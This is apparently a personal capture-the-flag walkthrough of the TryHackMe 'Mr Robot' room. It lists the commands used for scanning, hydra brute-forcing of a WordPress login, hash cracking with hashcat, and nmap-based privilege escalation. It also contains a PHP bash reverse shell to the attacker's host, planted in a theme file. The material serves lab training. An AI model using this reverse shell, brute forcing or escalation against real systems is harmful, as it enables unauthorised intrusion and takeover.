Mr Robot CTF

Room Link: https://tryhackme.com/room/mrrobot

Scanning

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

HTTP port 80

This ran for the majority of the time I was working on the box, I found the wordpress and checked robots.txt manually and the scan didn't really find anything of interest.

Kali

dirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txt

Key 1

Downloaded fsocity.dic

If you refresh the page you'll go to a wordpress site.

Test to see what users exist in wordpress, if the user doesn't exist it will give an error saying the user is invalid.

Kali

hydra -L fsocity.dic -p test  $VICTIM http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10
.10.70.148%2Fwp-admin%2F&testcookie=1:Invalid username" -V -t 30    

Because there were so many entries in fsocity.dic I tried to reduce it as much as I could by removing duplicates and passwords that I thought would be unlikely.

Kali

cat fsocity.dic | sort | uniq > new-fsocity.dic
#Remove lines with less than 4 characters
sed -r '/^.{,4}$/d' new-fsocity.dic > new-new-fsocity.dic
#Remove lines with just numbers
awk '! /^[0-9]+$/' new-new-fsocity.dic > nonums.dic 
#Remove lines with more than 11 characters
sed '/^.\{11\}./d' nonums.dic > final.txt

Kali

hydra -L Elliot -P fsocity.dic  $VICTIM http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F
10.10.70.148%2Fwp-admin%2F&testcookie=1:is incorrect." -V -t 30 

Reverse Shell

Reverse Shell Failed Attempt

revshell.php code

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>

Kali

vi revshell.php
zip revshell.zip revshell.php
nc -lvnp 443

Connection is made but it isn't stable.

Reverse Shell

wpscan found out that twentyfifeen is installed.

Kali

wpscan --url http://$VICTIM

Kali

nc -vlnp 443

Added the same shell to footer.php which should appear on every page visited. Then I just went back to http://$VICTIM/join and it worked.

Get autocomplete

Victim

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

cd /home/robot
ls
cat password.raw-md5 

Kali

hashcat -m 0 password.raw-md5 /usr/share/wordlists/rockyou.txt
hashcat -m 0 password.raw-md5 /usr/share/wordlists/rockyou.txt --show

Victim

su robot
Password: abcdefghijklmnopqrstuvwxyz

LinPeas

Kali

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh

Privilege Escalation

Victim

/usr/local/bin/nmap --interactive
nmap> !sh